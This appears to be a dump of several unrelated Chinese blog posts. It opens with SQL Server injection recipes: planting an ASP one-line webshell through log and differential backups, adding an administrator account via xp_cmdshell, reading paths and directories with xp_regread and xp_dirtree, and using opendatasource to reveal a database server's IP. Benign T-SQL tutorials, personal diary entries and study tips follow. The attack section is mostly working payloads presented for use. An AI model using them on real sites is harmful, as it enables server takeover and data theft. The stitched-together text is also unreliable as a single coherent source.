字符型

1.恢复当前库
;alter database 当前库 set RECOVERY FULL–

2.创建表cmd
;create table cmd (a image)–

3.备份当前库到D:\cmd1
;backup log 当前库 to disk = ‘D:\cmd1′ with init–

4.插入一句话代码到创建的表cmd
;insert into cmd (a) values (‘<%%25**ecute(request("a"))%%25>’)–  

5.备份一句话代码到站点根目录
;backup log 当前库 to disk = ‘D:\www_web\oct.asp’–

6.完成
‘;drop table 创建的表–

———————————-

数字型

1.恢复当前库
‘;alter database 当前库 set RECOVERY FULL–

2.创建表cmd
‘;create table cmd (a image)–

3.备份当前库到D:\cmd1
‘;backup log 当前库 to disk = ‘D:\cmd1′ with init–

4.插入一句话代码到创建的表cmd
‘;insert into cmd (a) values (‘<%%25**ecute(request("a"))%%25>’)–  

5.备份一句话代码到站点根目录
‘;backup log 当前库 to disk = ‘D:\www_web\oct.asp’–

6.完成
‘;drop table 创建的表–

——————————–

sa权限创建管理员用户

1.判断是否有注入;and 1=1 ;and 1=2  
;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa

2.添加系统的管理员
;exec master.dbo.xp_cmdshell ‘net user neeke neeke/add’;–
;exec master.dbo.xp_cmdshell ‘net localgroup administrators neeke /add’;–
 

<%eval(request("a")):response.end%> 备分专用一句话
加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.

日志备分WEBSHELL标准的七步:

1.InjectionURL’;alter database XXX set RECOVERY FULL– (把SQL设置成日志完全恢复模式)

2.InjectionURL’;create table cmd (a image)– (新建立一个cmd表)

3.InjectionURL’;backup log XXX to disk = ‘c:\cmd’ with init– (减少备分数据的大小)

4.InjectionURL’;insert into cmd (a) values (‘<%%25eval(request("a")):response.end%%25>’)– (插入一句话木马)

5.InjectionURL’;backup log XXX to disk = ‘d:\chinakm\test.asp’– (备分日志到WEB路径）

6.InjectionURL’;drop table cmd– （删除新建的cmd表）

7.InjectionURL’;alter database XXX set RECOVERY SIMPLE–(把SQL设置成日志简单恢复模式)

注：InjectionURL是注入点，XXX是数据库名称.

附上DB_ONER权限HACK的其他技巧,希望对菜菜有所帮助,高手略过.

数据库差异备份代码：

1、create table [dbo].[jm_tmp] ([cmd] [image])– 创建一个表

2、 declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0X6A006D00640063007700 backup database @a to disk = @s –备份数据库，@s为备份名称(jmdcw的16进制转换)

3、insert into [jm_tmp](cmd) values(0x3C2565786563757465287265717565737428226C222929253E)–将一句话木马 "<%execute(request("l"))%>"的16进制字符插入到表中

4、declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=’C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\hsqq.asp’ backup database @a to disk = @s WITH DIFFERENTIAL,FORMAT –对数据库实行差异备份，备份的保存路径暂定为C盘目录，文件名为hsqq.asp。

5、drop table [jm_tmp]– 删除此表。

网站物理路径读取代码：

1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)– 创建表

2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ‘HKEY_LOCAL_MACHINE’,'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,'/’– 将网站目录插到表字段中

3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ‘//暴出字段

4、drop table [jm_tmp]– 删除此表。

磁盘目录读取代码：

1、drop table [jm_tmp];create table [jm_tmp](subdirectory nvarchar(400) NULL,depth tinyint NULL,[file] bit NULL)– 创建表

2、delete [jm_tmp];insert [jm_tmp] exec master..xp_dirtree ‘C:\’,1,1– 将C盘的文件夹及文件插入到表中

3、 and 1=(select top 1 cast([subdirectory] as nvarchar(400)) char(124) cast([file] as nvarchar(1)) char(124) From(select Top 1 [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) ‘//暴出第一个文件夹名称

4、and 1=(select top 1 cast([subdirectory] as nvarchar(400)) char(124) cast([file] as nvarchar(1)) char(124) From(select Top 2 [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) ‘//暴出第二个文件夹名称

5、and 1=(select top 1 cast([subdirectory] as nvarchar(400)) char(124) cast([file] as nvarchar(1)) char(124) From(select Top X [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) ‘//暴出第X个文件夹或文件名称

6、drop table [jm_tmp]–删除此表

网站物理路径读取代码：

1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)– 创建表

2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ‘HKEY_LOCAL_MACHINE’,'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,'/’– 将网站目录插到表字段中

3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ‘//暴出字段

4、drop table [jm_tmp]– 删除此表。

注射过程中DB_ONER权限并且主机与数据库不在一起的搞法

其实.即使数据库和WEB不在一块还是有机会搞的.并不是说一点机会没.一般服务器装好系统什么的.都会装个IIS吧？列他C盘.看看有没有Inetpub 这个目录.就知道他有没有装IIS了.但是.不知道他IP也？怎么办呢？可以这样来，PING一下WEB服务器.扫他这一C段的1433端口.看看哪台开了.不过这方法也不好.现在很多主机都启用了防火墙.1433端口就算开了你也扫不着.这该怎么办呢？可以利用opendatasource宏让对方的 SQL与自己的数据库建立连接.既然能建立连接.就可以得到数据库服务器的IP地址了.我们来试试看.有几个前提得说一下.第一.你机器必须要有公网 IP.而且开放的1433端口要保证能被外网访问到.好.条件满足.就开始做吧！

我现在搞的这站.100%数据和WEB不在一块.但是从C盘看到了Inetpub文件夹.说明这数据库服务器安装了IIS.但是得不到他IP呀.怎么搞哦.简单.就用上面所说的方法搞一下.先在本机建个库先.打开查询分析器输入
create database hack520 create TABLE zhu(name nvarchar(256) null);create TABLE J8(id int NULL,name nvarchar(256) null); 点执行.

建立了一个hack520的库名.和zhu J8两个表.zhu里面有name这一个字段.J8也放了两字段名.一个是id一个是name.好了.现在就可以开始建立连接了~~~~~~~先看一下这条SQL语句insert into opendatasource(‘sqloledb’,'server=你的IP;uid=SQL用户;pwd=SQL密码;database=建立的库名’) .库名.表名 ‘执行的语句’ 恩现在开始吧…

http://www.xxx.com/news.asp?id=126‘inser … asource(‘sqloledb’,'server=219.149.xx.182;uid=sa;pwd=hack520!@#77169;database=hack520′).hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases–

在IE上执行咯.呵呵这个时候对方就会连接到我机器的SQL服务器.不信？netstat -an看一下

在CMD下输入命令：
netstat -an | find "1433"
 

建库：

USE MASTER
GO
IF EXISTS (SELECT * FROM SYSDATABASES WHERE NAME = ‘bbsDB’)–检查要创建的数据库是否已经存在
DROP DATABASE bbsDB–删除已存在的
EXEC XP_CMDSHELL ‘md e:\project’–调用DOS创建文件夹
CREATE DATABASE bbsDB–创建该数据库
ON–开始建库
(
NAME = ‘bbsDB_data’,–主数据库文件的逻辑名
FILENAME = ‘e:\project\bbsDB_data.mdf’,–主数据库文件的物理名
SIZE = 10MB,–主数据库文件的初始化大小
FILEGROWTH = 20%–主数据库文件的增长率
)
LOG ON–日志文件
(
NAME = ‘bbsDB_log’,
FILENAME = ‘e:\project\bbsDB_log.ldf’,
SIZE = 1MB,
MAXSIZE = 20MB,
FILEGROWTH = 10%
)
GO

建表：

USE bbsDB
GO
IF EXISTS (SELECT * FROM SYSOBJECTS WHERE NAME = ‘bbsUsers’)–检查该表是否已经创建
DROP TABLE bbsUsers–如果有则删除
GO
CREATE TABLE bbsUsers–创建该表
(
UID INT IDENTITY (1,1) NOT NULL,–自动编号，标识列
Uname VARCHAR(15) NOT NULL,–昵称
Upassword VARCHAR(10),–密码
Uemail VARCHAR(20),–电子邮件
Usex BIT NOT NULL,–性别
Uclass INT,–等级
Uremark VARCHAR(20),–备注
UregDate DATETIME NOT NULL,–注册时间
Ustate INT NULL,–状态（是否在线）
Upoint INT NULL–积分
)
GO

建约束：

USE bbsDB
GO
ALTER TABLE bbsUsers–主键
ADD CONSTRAINT PK_UID
PRIMARY KEY(UID)

ALTER TABLE bbsUsers–初始化密码默认为6个8
ADD CONSTRAINT DF_Upassword
DEFAULT (888888) FOR Upassword

ALTER TABLE bbsUsers–没人性别为男（1）
ADD CONSTRAINT DF_Usex
DEFAULT (1) FOR Usex

ALTER TABLE bbsUsers–默认级别1
ADD CONSTRAINT DF_Uclass
DEFAULT (1) FOR Uclass

ALTER TABLE bbsUsers–注册日期
ADD CONSTRAINT DF_UregDate
DEFAULT (GETDATE()) FOR UregDate

ALTER TABLE bbsUsers–状态默认离线
ADD CONSTRAINT DF_Ustate
DEFAULT (0) FOR Ustate

ALTER TABLE bbsUsers–默认积分20
ADD CONSTRAINT DF_Upoint
DEFAULT (20) FOR Upoint

ALTER TABLE bbsUsers–必须包含@
ADD CONSTRAINT CK_Uemail
CHECK (Uemail LIKE ‘%@%’)

ALTER TABLE bbsUsers–密码位数必须大于等于6位
ADD CONSTRAINT CK_Upassword
CHECK (LEN(Upassword) >= 6)
GO

过年的这几天我一直在想一个问题，那就是“究竟是我在玩网络？还是网络在玩我？”。

发现自从不在上学以来，我几乎每天都是10几个小时坐在电脑跟前度过的，有时我都分不清现在是晚上还是白天，今天是几号？星期几？

但是，有什么办法呢？其实我也不想待在家里，很烦！出去玩吧，就自己一个人，没心情。叫朋友吧，我叫谁呢？谁那么有空？而且我也想不出来出去了能有啥可玩的？

更不想看到大街上那些成双成对的~！！看见就难受！！！我不是嫉妒，我只是恨我自己！

有时我也会关掉电脑，一个人慢慢的走在马路上，抬头看看那车水马龙，人来人往，低头漫走发呆。也可能是在思考着什么，找到答案了就转过头来往回走，打开电脑，看看电影，听听音乐，查点资料，学点东西。

有时候我看到那些和我年龄差不多的人每天就是个玩，花钱大手大脚，就觉得他们没出息，浪费时间，浪费生命。但是有时又很羡慕他们，为什么他们可以那么逍遥自在，我为什么就不可以呢？可是我发现让我这么做或许有

点太难了。但再想一想自己，每天把时间都花在网络上，我真的是学习了吗？这真的是我想要的吗？难道我这样就比人家有出息吗？究竟是我在玩网络？还是网络在玩我？

日三省乎己！

经常有人问我一个问题：你的英语是怎么学的？为什么学的那么好？我多数会笑而不答，要么说：其实它很简单！

说实话，我的E文到底怎么要我比谁都清楚，真的很垃圾！！！我小学时候E文考试每次不及格。小学考初中时候我的英语才考了36分（满分120）！那时候我一点都不爱学那东西，初中以后也不知道怎么了，我感觉有时候

用E文和别人说话很好玩，见到认识的了就说“Hello！”（- -！这你要不认识了，那我真没办法了！）人家说：“下楼”！o(∩_∩)o…哈哈，貌似有些幼稚，但是这确实很有意思。就这样我开始喜欢上英语了，中考我的英语考了110（满分120）！！不错了吧！！！嘿嘿~！！

有人问我：那你怎么看的那些E文网站内容？E文资料？

答：首先，基本上我还是看得懂的（因为我知道一些语法规则！），偶尔会遇到一些不认识的单词，我不明白它的意思，可是结合一下上下文的意思及语法，也就大概知道是什么意思了，实在不会的，我会立刻百度之或者GOOGLE之！！！！

其次，其实很多时候，E文里面的一些单词是我们没有必要去了解它是什么意思的！如一些地名，国家名，人名啦之类的。碰到这样的，你只需知道它是一个符号，没必要知道是什么意思，比如吧 "herry"这个单词意思就是“哈利”，人名！！这个对你阅读文章有意义吗？没有吧？所以我们可以直接空过去！

有人问我： 我看见E文的就脑袋大，直接就晕了，怎么办？

答：继续看！而且还要多看，多查！！！比如我们搞软件开发的，有很多开发工具都是纯英文版的，根本就没有中文版或者是别人汉化的，那就只能靠自己了！！！第一次不知道是什么意思，就Look it up!!!（不懂这句E文，就赶紧去查吧，o(∩_∩)o…嘿嘿），之后呢你就会经常用这个工具，久而久之你就记住它啦！！（有些工具我一直都不知道上面的E文是什么意思，但是我就是会用！！）

下面介绍一点心得：

1.多听英文歌曲，最好拿着歌词，要慢节奏的，这样你可以听出发音及语气！

2.多看带中英文字幕的电影，听电影里面的人说话，看下面的字幕对照！！

3.speaking and talking with others in english!!(if you don’t know this,please look it up!!)

我就晕死了，今天真TM倒霉啊，大清早9点到赛格电脑城等人，把人能冻死，真是冻得要命啊！去的时候我的公交IC卡还在，一直到晚上11点才回来，准备上车呢，口袋一摸，晕~，卡没了！

里面还有40多块钱啊！！！

MD，关键是这卡办的时候不记名，人家也给说了不挂失！！自认倒霉吧！！改天有钱了在办一张吧！！！！！

我总结了一下自学JAVA失败几种原因：希望对大家有帮助！
1、学习材料问题：目前相关的技术书籍种类和内容良莠不齐，有些书籍内容经常存在错误现象，书上的案例经常在机器上运行不了。而网络上找资料却在信息选择上工作量很大，比如说，在google搜关键字hibernate，出现的信息条数之多令人生畏。要从众多的信息中拾掇出自学需要的，实属不易。而且即便最终整理出来，得到的也只是知识点或者片断，不是系统知识；
2、缺乏指导，遇到问题无法继续。Java的知识体系非常大，很多技术的学习和深入都需要基于另外一种技术为基础，自学很难理出头绪。遇到疑问无法及时解决，更无法继续推进，时间长了自然选择放弃；
3、缺乏学习氛围，惰性是人类的共性，在缺乏外在压力和阶段目标的前提下很难保障时刻保持进度，尤其是在困难重重之下，经常受外界的干扰而转移精力。

现在我们来为刚才所建的TEST数据库建表

方法：

CREATE TABLE 表名

(

字段1 数据类型 列特征（是否非空）

字段2 数据类型 列特征（是否非空）

）

下面详细列子：

USE TEST
CREATE TABLE TTEST
(
StuName VARCHAR(20) NOT NULL,
StuNo int NOT NULL,
StuAge int NOT NULL,
StuAddress TEXT
)
GO

使用T-sql创建数据库

USE master –使用MASTER库
CREATE DATABASE test –创建库test
ON
(
NAME = ‘DBTEST’,–逻辑名
FILENAME = ‘E:\TESTDB.MDF’,–物理文件地址
SIZE = 10,–初始化大小
MAXSIZE = 100,–最大值
FILEGROWTH = 10%–增加量

)
LOG ON–日志文件
(
NAME = ‘LOGTEST’,–日志名
FILENAME = ‘E:\TESTLOG.LDF’,–日志物理文件地址
SIZE = 5,–日志初始化大小
FILEGROWTH = 1–日志增加量
)
GO

可能我是闲着没事干了吧，把以前的PJBLOG删了，换成ZBLOG了，可能是因为PJ的不是静态页面吧。